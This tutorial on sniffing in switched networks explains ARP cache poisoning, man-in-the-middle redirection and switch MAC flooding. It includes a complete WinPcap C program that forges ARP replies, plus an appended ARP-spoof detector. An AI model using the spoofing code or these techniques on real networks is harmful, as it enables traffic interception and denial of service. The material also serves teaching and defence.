Sniffing in switched networks and ARP spoofing

Sniffing on Ethernet is a mixed blessing for network security: network administrators can use it to trace packets and find network problems, but in the hands of an attacker it poses a serious security threat to the entire network. We will not go into the pros and cons of sniffing here.

ARP cache table
Suppose a network like this:

            ----------
            |  Hub   |
            ----------
           /    |    \
          /     |     \
     Host A   Host B   Host C

where
  A: IP 192.168.10.1, MAC AA-AA-AA-AA-AA-AA
  B: IP 192.168.10.2, MAC BB-BB-BB-BB-BB-BB
  C: IP 192.168.10.3, MAC CC-CC-CC-CC-CC-CC

Assume that B belongs to a sniffing enthusiast. Machine A's ARP cache, for example, looks like this:

C:\> arp -a

Interface: 192.168.10.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  192.168.10.3          CC-CC-CC-CC-CC-CC     dynamic

This is the ARP cache table on machine 192.168.10.1. Suppose A runs "ping 192.168.10.3". To ping host C, A first looks up its local ARP cache for the MAC address that belongs to C's IP address and then transmits the data with C's MAC address as the destination. If A has no ARP entry for C, A broadcasts an ARP request; when C receives the request it sends a reply containing C's MAC address, and when A receives that reply it updates its local ARP cache and then uses the MAC address to send the data (the MAC address is what the NIC actually addresses the frame to). The local ARP cache is therefore the basis for traffic on the local network, and the cache is dynamic.

Hub-based network

Many networks are connected with hubs. When a packet is sent to another computer through a hub, the hub simply broadcasts the packet to all of its ports. This is the network structure in the example above.

Now A needs to send TCP packets to C. First, A checks its local ARP cache for an entry whose IP address is 192.168.10.3, that is, C. If there is none, A broadcasts an ARP request; C receives the request and replies, and A updates its ARP cache table and so obtains the MAC address corresponding to C's IP address. The TCP packet is then transmitted in an Ethernet frame that carries C's MAC address. When the frame reaches the hub, the hub broadcasts the whole frame to all ports, and C receives the packet sent by A.

Because the hub broadcasts to every port, computer B also receives the packets A sends to C, which is exactly what B needs in order to sniff.

A hub-based network is therefore basically insecure, and sniffing in such a network is very easy.

Switched LAN

Replacing the hub with a switch solves several of the hub's security problems, among them sniffing. A switch does not broadcast packets to every port: it uses its own address cache to decide which port a packet is sent out of. So if the hub in the example above is replaced with a switch, B no longer receives the packets A sends to C, and even putting B's NIC into promiscuous mode does not allow sniffing.

ARP spoofing

ARP does not accept replies only after it has sent a request. Whenever a computer receives an ARP reply packet, it updates its local ARP cache and stores the IP and MAC addresses carried in the reply. So in the network assumed above, B sends A a reply it has forged itself, in which the sender IP address is 192.168.10.3 (C's IP address) and the sender MAC address is DD-DD-DD-DD-DD-DD (C's MAC address should have been CC-CC-CC-CC-CC-CC; it is forged here). When A receives B's forged ARP reply, it updates its local ARP cache (A does not ...).

Now machine A's ARP cache is updated:

C:\> arp -a

Interface: 192.168.10.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  192.168.10.3          DD-DD-DD-DD-DD-DD     dynamic

This is no small matter. Traffic on a LAN is delivered by MAC address, not by IP address, and the MAC address for 192.168.10.3 has now been changed to one that does not exist on the network. Ping 192.168.10.3 from A now: the NIC puts DD-DD-DD-DD-DD-DD in the frame, and the result is that the connection is broken. A cannot ping C at all!!

This is a simple ARP spoofing.

Let us implement this ARP spoofing. Here we need the API and driver provided by WinPcap (http://winpcap.polito.it/). WinPcap is a great open-source project; on Windows, Nmap, Snort and WinDump all use it.

//////////////////////////////////////////////////////////////////////////////
//
// ARP sender
//
// Creator: refdom
// Email: refdom@263.net
// Home page: www.opengram.com
//
// 2002/4/7
//
//////////////////////////////////////////////////////////////////////////////

#include "stdafx.h"
#include "Mac.h"        // GetMacAddr(): the author's own helper that converts a 12-hex-digit string to a 6-byte MAC address; not listed here
#include <stdio.h>
#include <winsock2.h>   // htons(), inet_addr()
#include <packet32.h>   // WinPcap packet.dll API

#define EPT_IP          0x0800  /* type: IP */
#define EPT_ARP         0x0806  /* type: ARP */
#define EPT_RARP        0x8035  /* type: RARP */
#define ARP_HARDWARE    0x0001  /* hardware type for 802.3 (Ethernet) frames */
#define ARP_REQUEST     0x0001  /* ARP request */
#define ARP_REPLY       0x0002  /* ARP reply */

#define MAX_NUM_ADAPTER 10

#pragma pack(push, 1)

typedef struct ehhdr
{
    unsigned char  eh_dst[6];   /* destination Ethernet address */
    unsigned char  eh_src[6];   /* source Ethernet address */
    unsigned short eh_type;     /* Ethernet packet type */
} EHHDR, *PEHHDR;

typedef struct arphdr
{
    unsigned short arp_hrd;     /* format of hardware address */
    unsigned short arp_pro;     /* format of protocol address */
    unsigned char  arp_hln;     /* length of hardware address */
    unsigned char  arp_pln;     /* length of protocol address */
    unsigned short arp_op;      /* ARP/RARP operation */

    unsigned char  arp_sha[6];  /* sender hardware address */
    unsigned long  arp_spa;     /* sender protocol address */
    unsigned char  arp_tha[6];  /* target hardware address */
    unsigned long  arp_tpa;     /* target protocol address */
} ARPHDR, *PARPHDR;

typedef struct arppacket
{
    EHHDR  ehhdr;
    ARPHDR arphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)

int main(int argc, char *argv[])
{
    static char AdapterList[MAX_NUM_ADAPTER][1024];
    char        szPacketBuf[600];
    char        MacAddr[6];

    LPADAPTER   lpAdapter;
    LPPACKET    lpPacket;
    WCHAR       AdapterName[2048];
    WCHAR      *temp, *temp1;
    ARPPACKET   ARPPacket;

    ULONG       AdapterLength = 1024;

    int         AdapterNum = 0;
    int         nRetCode, i;

    // Get the list of adapters
    if (PacketGetAdapterNames((char *)AdapterName, &AdapterLength) == FALSE)
    {
        printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }

    // Split the double-NUL-terminated list of adapter names
    // (this WinPcap release returns it as wide strings on NT, hence the *2)
    temp  = AdapterName;
    temp1 = AdapterName;
    i = 0;
    while ((*temp != L'\0') || (*(temp - 1) != L'\0'))
    {
        if (*temp == L'\0')
        {
            memcpy(AdapterList[i], temp1, (temp - temp1) * 2);
            temp1 = temp + 1;
            i++;
        }
        temp++;
    }

    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
        wprintf(L"\n%d- %s\n", i + 1, AdapterList[i]);
    printf("\n");

    // Open the first adapter by default (assumed to be the NIC on the LAN)
    lpAdapter = (LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[0]);

    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        printf("Unable to open the driver, error code: %lx\n", nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if (lpPacket == NULL)
    {
        printf("\nError: failed to allocate the LPPACKET structure.");
        return 0;
    }

    ZeroMemory(szPacketBuf, sizeof(szPacketBuf));

    // Ethernet header: the frame goes from B (this machine) to A
    if (!GetMacAddr("aaaaaaaaaaaa", MacAddr))
    {
        printf("Get MAC address error!\n");
        return 0;
    }
    memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);  // destination MAC address (address of A)

    if (!GetMacAddr("bbbbbbbbbbbb", MacAddr))
    {
        printf("Get MAC address error!\n");
        return 0;
    }
    memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);  // source MAC address (address of B)

    ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
    ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op  = htons(ARP_REPLY);

    // Sender fields: C's IP address bound to the non-existent MAC DD-DD-DD-DD-DD-DD
    if (!GetMacAddr("dddddddddddd", MacAddr))
    {
        printf("Get MAC address error!\n");
        return 0;
    }
    memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);           // forged MAC address of C
    ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3");   // IP address of C

    // Target fields: A, whose ARP cache will be updated
    if (!GetMacAddr("aaaaaaaaaaaa", MacAddr))
    {
        printf("Get MAC address error!\n");
        return 0;
    }
    memcpy(ARPPacket.arphdr.arp_tha, MacAddr, 6);           // MAC address of target (A)
    ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1");   // IP address of target (A)

    // Copy the 42-byte packet into the send buffer; 60 bytes is the minimum Ethernet frame
    memcpy(szPacketBuf, (char *)&ARPPacket, sizeof(ARPPacket));
    PacketInitPacket(lpPacket, szPacketBuf, 60);

    if (PacketSetNumWrites(lpAdapter, 2) == FALSE)
    {
        printf("Warning: unable to send more than one packet in a single write!\n");
    }

    if (PacketSendPacket(lpAdapter, lpPacket, TRUE) == FALSE)
    {
        printf("Error sending the packets!\n");
        return 0;
    }

    printf("Send OK!\n");

    // Close the adapter and exit
    PacketFreePacket(lpPacket);
    PacketCloseAdapter(lpAdapter);
    return 0;
}

So A receives a spoofed ARP reply. A is fooled!! If a certain machine on the LAN is not pleasing to the eye, ......

Ethernet sniffing is very useful, but a switched network restricts it and greatly reduces how far it reaches. However, the cache tables in hosts and switches (dynamically updated address tables; the same applies below) are still (mostly) dynamic. To sniff effectively in a switched network (as an underground party?), we have to deal with these various cache tables, and even fool them, building on the ARP spoofing described above.

ARP spoofing on the target

As implemented in the program above, when spoofing a target, A wants to ping host C but sends to the address DD-DD-DD-DD-DD-DD instead. If C's MAC address is instead spoofed as BB-BB-BB-BB-BB-BB, the packets A sends to C are delivered to B. B can then receive the packets sent by A, and the sniffing succeeds.
A notices nothing about this change, but one thing does make A suspicious: A and C can no longer communicate!! B receives the packets A sends to C, but they may never be passed on to C.
The next step is the "man in the middle", ARP redirection. If IP forwarding is enabled on B, the packets A sends are forwarded to C, as a router would do. However, if B then emits ICMP redirects, the whole plan is interrupted.
Alternatively, B modifies and forwards the packets itself: it captures everything A sends and then sends it on to C, and C takes the packets it receives as having come from A. The packets C sends, however, still go directly to A unless ARP spoofing is performed against C as well. B then sits as the bridge between A and C.

MAC spoofing on the switch

The switch also maintains a dynamic MAC cache. In general it works like this. The switch keeps an internal MAC address table, port n <-> MAC, recording the MAC addresses seen on each port. The table starts out empty, and the switch learns from the frames that pass through it. For example, when the computer connected to port 1 sends a frame, the frame enters the switch from port 1, the switch reads the frame's source MAC address AAAA and records port 1 <-> AAAA in the address table. From then on, all frames addressed to MAC AAAA are sent out of port 1 only, and not out of the other ports.

Spoofing here is similar to spoofing the target above. If the MAC-port table on the switch is modified, the corresponding MAC and port change together, and data that should not be sent to the sniffer is sent to it, which again achieves the goal of sniffing. B modifies the source MAC address of the packets it sends to be A's MAC address. As they pass through the switch, the switch finds that the address on B's port is now A's MAC address, so it maps A's MAC address to B's port. Data addressed to A, which should have gone out of A's port, is then sent out of B's port, and machine B obtains the data sent to A.

There is a problem here, however: A will not receive the data, and sniffing is not meant to disrupt normal communication. Moreover, it is not clear from this spoofing whether a MAC address in the switch can correspond to multiple ports. For more information, see.

Flood the switch

Given how the switch builds its MAC-port mapping, and because the MAC-port cache table is updated dynamically, the whole port table of the switch can be changed. MAC address spoofing flooding sends a large number of packets with fake MAC addresses; the switch keeps updating its MAC-port cache, and once the normal MAC-port relationships have been destroyed the switch floods every port, so that the switch essentially turns into a hub that sends packets to all ports, which achieves the same goal for sniffing.

How much of this a switch can handle is limited: the condition is abnormal and may cause packet loss, and the state of the switch is then unknown. If network communication is badly damaged, this is no longer normal sniffing (although sniffing may always cause some loss).

Be careful when doing anything to the switch. If port protection is enabled, the switch may shut down all of the users. So when spoofing or otherwise manipulating devices such as hosts, it is better to aim at upper-level devices, such as the target host or the router.

All of the sniffing methods above rely on these dynamic tables, so static ARP entries can be used as a defense. On Windows, use arp -s to set static ARP entries.
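The defensive counterpart of the sender above, as an added example that is not part of the original article: a check that parses an ARP reply laid out exactly as the page's EHHDR/ARPHDR structs and flags it when the sender IP is pinned to a different MAC (the entry "arp -s" would protect). The hosts, the DD-DD-DD-DD-DD-DD MAC and the pinned table are taken from the page's scenario; the frame is constructed in memory, nothing is sent.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Constants from the page's sender, plus byte offsets inside the 42-byte
 * frame (EHHDR, 14 bytes, followed by ARPHDR, 28 bytes). */
enum { EPT_ARP = 0x0806, ARP_REPLY = 2, ARP_FRAME_LEN = 42,
       OFF_TYPE = 12, OFF_OP = 20, OFF_SHA = 22, OFF_SPA = 28, OFF_THA = 32, OFF_TPA = 38 };
/* One IP<->MAC binding pinned in a host's ARP cache, as "arp -s" does. */
struct binding { uint8_t ip[4]; uint8_t mac[6]; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }

/* 1 = ARP reply whose sender IP is pinned to a different MAC (poisoning),
 * 0 = reply agrees with the table or concerns an unpinned IP,
 * -1 = not a complete ARP reply (ignored). */
int arp_reply_conflicts(const uint8_t *f, size_t len, const struct binding *tab, size_t n)
{
    if (len < ARP_FRAME_LEN || rd16(f + OFF_TYPE) != EPT_ARP || rd16(f + OFF_OP) != ARP_REPLY)
        return -1;
    for (size_t i = 0; i < n; i++)
        if (memcmp(tab[i].ip, f + OFF_SPA, 4) == 0)
            return memcmp(tab[i].mac, f + OFF_SHA, 6) != 0;
    return 0;
}

/* Lay out an ARP reply in the page's field order (constructed sample frame). */
void build_arp_reply(uint8_t *out, const uint8_t *dst, const uint8_t *src, const uint8_t *sha,
                     const uint8_t *spa, const uint8_t *tha, const uint8_t *tpa)
{
    /* eh_type=ARP, arp_hrd=1, arp_pro=IP, arp_hln=6, arp_pln=4, arp_op=reply */
    static const uint8_t fixed[10] = {0x08,0x06, 0x00,0x01, 0x08,0x00, 6,4, 0x00,0x02};
    memcpy(out, dst, 6);           memcpy(out + 6, src, 6);
    memcpy(out + OFF_TYPE, fixed, 10);
    memcpy(out + OFF_SHA, sha, 6); memcpy(out + OFF_SPA, spa, 4);
    memcpy(out + OFF_THA, tha, 6); memcpy(out + OFF_TPA, tpa, 4);
}

/* The page's hosts A, B, C and the bogus DD MAC; A pins C's IP to C's real MAC. */
static const uint8_t MAC_A[6] = {0xAA,0xAA,0xAA,0xAA,0xAA,0xAA}, MAC_B[6] = {0xBB,0xBB,0xBB,0xBB,0xBB,0xBB};
static const uint8_t MAC_C[6] = {0xCC,0xCC,0xCC,0xCC,0xCC,0xCC}, MAC_D[6] = {0xDD,0xDD,0xDD,0xDD,0xDD,0xDD};
static const uint8_t IP_A[4] = {192,168,10,1}, IP_C[4] = {192,168,10,3};
static const struct binding table_a[1] = {{{192,168,10,3}, {0xCC,0xCC,0xCC,0xCC,0xCC,0xCC}}};

/* Inspect one reply from B to A that claims C's IP belongs to claimed_mac. */
int check_reply_claiming_c(const uint8_t *claimed_mac)
{
    uint8_t frame[ARP_FRAME_LEN];
    build_arp_reply(frame, MAC_A, MAC_B, claimed_mac, IP_C, MAC_A, IP_A);
    return arp_reply_conflicts(frame, sizeof frame, table_a, 1);
}
```

A sniffer or host agent would feed every captured ARP reply through arp_reply_conflicts() and alert on a result of 1, since a pinned entry is exactly what the forged reply from the page tries to overwrite.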
